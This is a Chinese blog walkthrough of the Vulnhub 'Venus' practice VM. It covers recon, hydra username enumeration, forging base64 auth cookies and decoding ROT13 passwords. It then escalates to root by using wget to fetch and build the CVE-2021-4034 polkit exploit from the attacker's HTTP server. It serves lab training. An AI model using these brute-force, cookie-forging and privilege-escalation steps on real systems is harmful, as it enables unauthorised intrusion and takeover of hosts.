Vulnhub-行星系列:Venus渗透-超详细保姆式教学

已于 2024-08-31 20:02:20 修改
阅读量626 收藏 4
点赞数 18
文章标签: 网络安全 linux web安全 安全
于 2024-08-31 17:37:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73413340/article/details/141751789
版权

借用Vulnhub的一句话:请记住,VulnHub 是一个免费的社区资源,因此我们无法检查提供给我们的机器。在下载之前,请阅读我们的常见问题解答部分,这些部分涉及运行未知 VM 的危险,以及我们关于“保护您自己和您的网络”的建议。如果您了解风险,请下载!

靶机下载地址:https://download.vulnhub.com/theplanets/Venus.ova

运行环境:​​​​​Virtualbox、Vmware等虚拟机。这里推荐Vmware

一、目标发现主机扫描
arp-scan -I eth0 -l

发现目标靶机ip地址是192.168.195.128

二、端口扫描
nmap -Pn -sV 192.168.195.128

通过nmap扫描发现了目标主机开放了22端口、8080端口

 -Pn:假设主机在线,跳过主机发现阶段

 -sV:对服务的识别

三、站点探测

浏览器访问http://192.168.195.128:8080         #以实际扫描到的IP地址为准

发现是一个用户登录页面并给出了一个账户密码 guest:guest

登录进去是一个金星探测图没有太多用处

四、目录爆破

gobuster dir -u http://192.168.195.128:8080/ -w /usr/share/wordlists/dirbuster/directory-2.3-small.txt

dir:对文件和目录进行枚举

-u:指定目标系统的URL(网址)等

-w:指定字典文件

Kali自带的字典文件默认位置 /usr/share/wordlists/dirbuster/directory-2.3-small.txt

gobuster 未安装的话安装命令:apt install gobuster

通过gobuster 发现了一个/amin

访问地址 http//192.168.195.128:8080/admin 发现了管理登录后台并且使用的是Django框架

但是当我们输入用户名和密码时会出现内部服务器报错    #这里ip地址重启之后改成130了

现在想想那我们的入手点就只有第一个登录界面了返回刚才那个界面http://192.168.195.128:8080。但是他只给我们了一个用户名跟密码,没有什么其他有用的信息。那我们想想如果给他一个错误的用户名会怎么样?

果然,给他一个错误的用户名之后提示了无效的用户名,利用这一点我们可以尝试使用 hydra 枚举其他有效用户。

五、使用THC-Hydra 进行 HTTP POST 攻击

1.Hydra 概述

hydra 是黑客组织thc的一款开源的密码攻击(爆破)工具

用户登录口令破解工具,支持多种登录协议如SSH、FTP、Telnet等

用法:

hydra -l kali -p /usr/share/wordlists/rockyou.txt ssh://127.0.0.1

-l:指定破解的用户,对特定用户破解

-L: 指定用户名字典

-p:指定密码字典

当使用 HTTP POST 请求进行用户登录时,通常是通过 web 表单,这意味着我们应该使用“http-post-from”服务模块我们可以提供服务名称加上 -U 来获取有关所需参数的其他信息

参数至少需要三个以“:”分隔的值

第一个参数:

首先是服务器上要 GET 或 POST 的页面(URL)例如“/login”或“/admin/login/?next=/admin/”

<form action="/admin/login/?next=/admin/" method="post" id="login-form">

第二个参数:

POST/GET 变量(从浏览器、代理等获取),并且用户名和密码被替换为"^USER^"(对于 base64 编码为"^USER64^")和"^PASS^"(对于 base64 编码为"^PASS64^")

第三个参数:

我们还必须提供条件字符串<condition string>来指示登录尝试何时失败这可以通过尝试几次手动登录来发现。

hydra -L usernames.txt -p pass -s 8080 192.168.195.128 http-post-form "/:username=^USER^&password^PASS^:Invalid username."

使用hydra成功拿到两个新用户venusmagellan

六、使用BurpSuite分析HTTP报文并替换cookie

BurpSuite概述:

BurpSuite是一个非常流行的web应用程序安全程序安全漏洞和利用工具、通常被业界的web应用程序安全专业人员和渗透测试人员使用。

BurpSuite是一个基于代理的工具,允许渗透测试人员拦截攻击者的web浏览器和web应用程序之间的通信消息允许渗透测试人员从客户端修改请求消息。

简单地说,渗透测试人员将使用BurpSuite作为拦截代理,他将捕获来自他们机器上web浏览器的任何请求消息允许渗透测试人员修改请求消息中的字段,然后将其转发到web应用服务器。

1)kali搜索BurpSuite

2) 点击Next、Start Burp
3)进入主界面之后点击右上角的小齿轮查看IP地址跟端口

没有ip地址跟端口的点击Add添加即可

4) 打开kali的火狐浏览器选择右上角三条横杠点击Settings

5)一直划到最下面找到Network Settings点击settings按钮

选择Manual proxy confiquration添加BurpSuite看到的ip地址跟端口并选择Also use this proxy for HTTPS完成之后点击ok即可。如下

6)设置完成之后返回登录页面输入账户密码点击Login即可

进入到金星的页面之后进入到BurpSuite选择Proxy选择HTTP history就能看到刚才登陆的请求点击进去

当我们以访客用户身份登录时,会设置一个 auth cookie,
现在我们向服务器发出的每个请求(如刷新页面)都会发送该cookie以验证我们是否已通过身份验证。

发现base64加密解密得出不一样的东西

得到guest:thrfg 现在我们有了用户名和一些乱码,可能是编码密码。 现在我们将专注于用户名。如果我们为之前找到的一位用户更改它,将其编码为 base64 并用原始 cookie 替换它会怎样?

CTF在线工具-在线base编码|在线base解码|base16编码|base32编码|base64编码 (hiencode.com)icon-default.png?t=N7T8http://www.hiencode.com/base64.html也可以用BurpSuite自带的编码工具,只要是能编码base64的工具都可以

7) 替换cookie,进入以下页面点击Intercept is off

然后指示灯就会变红,接下来返回浏览器刷新页面点击Resend就会弹出BurpSuite

先右击弹出来的BurpSuite文本界面选择Sendto Repeater点击第二行导航栏Repeater选项

需要删除最下面的一行用户跟密码的然后替换刚才编码加密的内容dmVudXM6dGhyZmc=然后再点击Send

他返回的cookie内容可以看到变了不一样了,我们拿去解密一下看看。BurpSuite或其他网站都行

解密得出venus:irahf

同样的方法我们试试另一个用户magellan

替换cookie的auth为bWFnZWxsYW46dGhyZmc=然后点击Send

返回的cookie还是不一样解码得到 magellan:irahfvnatrbybtl1989

目前已经得到
guest:thrfg
venus:irahf
magellan:irahfvnatrbybtl1989
七、rot13解码

拿去Decrypt a Message - Cipher Identifier - Online Code Recognizer (dcode.fr)分析一下

经过尝试这些是rot13编码

rot13加密原理:Rot13的加密原理-CSDN博客

通过rot13解密得出

guest:guest
venus:venus
magellan:venusiangeology1989

尝试使用ssh登录经过尝试只有magellan可以正常登录

八、提权

在用户目录下拿到了flag1

sudo -l发现不行

那就看看有没有什么可以你用的suif程序来进行提权,发现有个polkit-agent-helper-1太好了搜索发现可以使用CVE-2021-4034来进行提权

polkit提权

1、polkit是许多linux发行版默认安装的系统服务。它由systemd使用。因此任何使用systemd的linux发行版也会使用polkit

2、漏洞:CVE-2021-3560/CVE-2021-4034

该漏洞使非特权本地用户能够获得系统的root shell。只需要几个标准的命令行工具即可轻松利用该漏洞

【免费】CVE-2021-4043资源-CSDN文库icon-default.png?t=N7T8https://download.csdn.net/download/qq_73413340/89699470?spm=1001.2014.3001.5501

下载完CVE-2021-3560/CVE-2021-4034之后需要复制到kali中然后使用python架构一个简易的HTTP服务器

python -m http.server -b 192.168.195.123 8090  #ip地址是kali的 8090是端口可自定义未占用的

然后需要在靶机下载下来

wget http://192.168.195.123:8090/CVE-2021-4034.tar.gz

解压

tar xzf CVE-2021-4034.tar.gz

解压完成后进入目录使用make编辑成二进制程程序

然后运行./cve-2021-4034

成功提权后flag在root目录下

id
cd /root
cat root_flag.txt

总结:本靶机利用登录时的用户名报错并且利用hydra做用户名枚举,然后通过BurpSuite做cookie信息的修改,使用ssh登陆之后利用可利用的suid程序进行提权最后获得第二个flag。

至此打靶完成制作不易耗时较长,为的就是向大家展示更详细的教学。如有做得不对或不懂的地方可在评论区评论本人看到会第一时间回复。

苗满空山
关注
  • 18
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
高通开发系列 - linux kernel内核升级msm-3.18升至msm-4.9(1)
fulinux的博客
02-10 1733
高通开发系列 - linux kernel更新msm-3.18升至msm-4.9
Vulnhub-THE PLANETS: VENUS渗透
laoyanCZ的博客
02-05 1103
Vulnhub:THE PLANETS: VENUS ( The Planets: Venus ) 渗透测试由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
靶机渗透练习83-The Planets:Venus
hirak0的博客
04-26 1242
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-venus,705/ Description Difficulty: Medium Venus is a medium box requiring more knowledge than the previous box, “Mercury”, in this series. There are two flags on the box: a user and root flag which incl
vulnhub靶场——THE PLANETS:VENUS
Czheisenberg的博客
02-12 1083
THE PLANETS: VENUS 准备 攻击机: kali 靶机: THE PLANETS: VENUS NAT 192.168.91.0 网段 下载连接: https://www.vulnhub.com/entry/the-planets-venus,705/ ![8b10717b2e9b3e632be8d3ce5d0f2d34.png][8b10717b2e9b3e632be8d3ce5d0f2d34] 信息搜集与利用 主机发现 python3 ping.py -H 192.168.91.0/24
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus
Aluxian_的博客
07-10 759
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度中等吧1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.替换Cookie值 进行解密Base64和Rot13解密3.漏洞得利用(漏洞很强大!4.缓冲区溢出提权(参考大佬wp 比较难 不太会)系列完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!
kubeadm安装kubernetes-1.15.0版本异常The HTTP call equal to ‘curl -sSL http://localhost:10255/healthz’ ....
谦190的博客
09-19 1937
安装kubernetes-1.15.0版本时候,出现如下的报错: The HTTP call equal to ‘curl -sSL http://localhost:10255/healthz’ failed with error: Get http://localhost:10255/healthz: dial tcp 127.0.0.1:10255: getsockopt: connect...
推荐项目:venus-cloud-feign —— Spring Cloud Feign的实战增强库
最新发布
gitblog_01130的博客
08-30 479
推荐项目:venus-cloud-feign —— Spring Cloud Feign的实战增强库 venus-cloud-feignvenus-cloud-feign-对Spring Cloud Feign的增强项目地址:https://gitcode.com/gh_mirrors/ve/venus-cloud-feign 随着微服务架构的普及,Spring Cloud作为业界领先的微服务解...
Python 3.6学习--基础3:函数的定义
X80757的博客
07-30 920
来源:https://docs.python.org/3.6/tutorial/controlflow.html#the-range-function &gt;&gt;&gt; def fib(n): # write Fibonacci series up to n ... """Print a Fibonacci series up to n.""" ... a, b ...
Filecoin系列 - 首个实现版本Go-filecoin
搬砖魁首的博客
06-10 561
Filecoin的首个实现版本go-filecoin于2019年2月15号上线。 现在改名为 venus
The-Venus-Project-website:The Venus Project网站的Github存储库
05-16
The Venus Project网站的Github存储库 Docker(推荐) 如果选择在工作环境中使用Docker,则需要首先在机器上安装Docker: : 完成所有入门步骤以熟悉docker: : 之后,您应该按照以下步骤在您的Venus Project...
venus-signalk-tank-service:将Signal K储罐数据注入Venus OS
02-14
venus-signalk-tank服务 venus-signalk-tank-service提供了一种将储罐数据从Signal K注入到Venus OS dbus上的机制,从而可以在诸如Victron CCGX之类的Venus OS设备上显示此类数据。 这很有用,因为它为维纳斯...
module-all:Lof All Extension - 配置启用所有 venus 扩展上使用的通用 js、css 文件。 例如
08-04
Lof 所有扩展 该扩展程序包含在所有 landofcoder 扩展程序中以生成管理菜单 1. 文档 2. 如何安装所有扩展 通过 composer 安装(推荐) 在 Magento 2 根文件夹中运行以下命令: composer require landofcoder/...
dbus-mqtt:Venus OS服务将Venus OS上的D-Bus映射到MQTT
05-19
dbus-mqtt 一个将D总线中的值发布到MQTT代理的python应用程序。 该脚本还支持来自MQTT代理的请求,以更改本地D-Bus上的值。 该应用程序作为服务在上。 默认情况下,它是禁用的。 要启用,请转到GX设备菜单上的设置...
VENUS-C:VENUS-C为小型研究小组提供新的云解决方案。-开源
05-15
VENUS-C是一项由欧盟委员会第七框架计划资助的项目,其优势来自于计算服务提供商和科学用户社区之间的联合合作,以开发,测试和部署面向欧洲科学和中小企业的大型云计算基础架构。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8432
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux基础知识(一、什么是Linux
心寒的博客
08-26 1920
什么是Linux Linux创始人
Linux中的常见命令——用户管理命令
qq_45569925的博客
08-27 1337
默认创建用户的时候会在home文件夹下创建一个与用户同名的文件夹【该用户的主目录】,也可以在创建用户的时候设置该用户主目录的名称。【输入的密码是不在控制台显示的,输入完之后直接按回车键即可】使用wgh用户查看root下的文件。【此时的用户是没有密码的】给创建的用户设置密码。查看某个用户是否存在。
linux 系统性能调优技巧
m0_50641264的博客
08-27 1109
【代码】linux 系统性能调优技巧。
invalid initialization of reference of type 'magik::venus::TensorM&' from expression of type 'std::vector<magik::venus::TensorM>'
06-09
这个错误通常是因为您在尝试将一个 `std::vector` 对象转换为一个引用类型 `magik::venus::TensorM&`。引用类型只能引用一个对象,而不能引用多个对象,因此您需要修改代码以正确引用 `std::vector` 中的单个对象。可能的解决方法包括: 1. 如果您只需要引用 `std::vector` 中的第一个元素,可以使用 `std::vector` 的 `at()` 或 `front()` 方法来获取第一个元素的引用。例如: ``` magik::venus::TensorM& tensor = tensors.front(); ``` 2. 如果您需要遍历 `std::vector` 中的所有元素,请使用一个循环来遍历 `std::vector` 并对每个元素进行操作。例如: ``` for (auto& tensor : tensors) { // 对每个 tensor 进行操作 } ``` 希望这可以帮助您解决问题!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值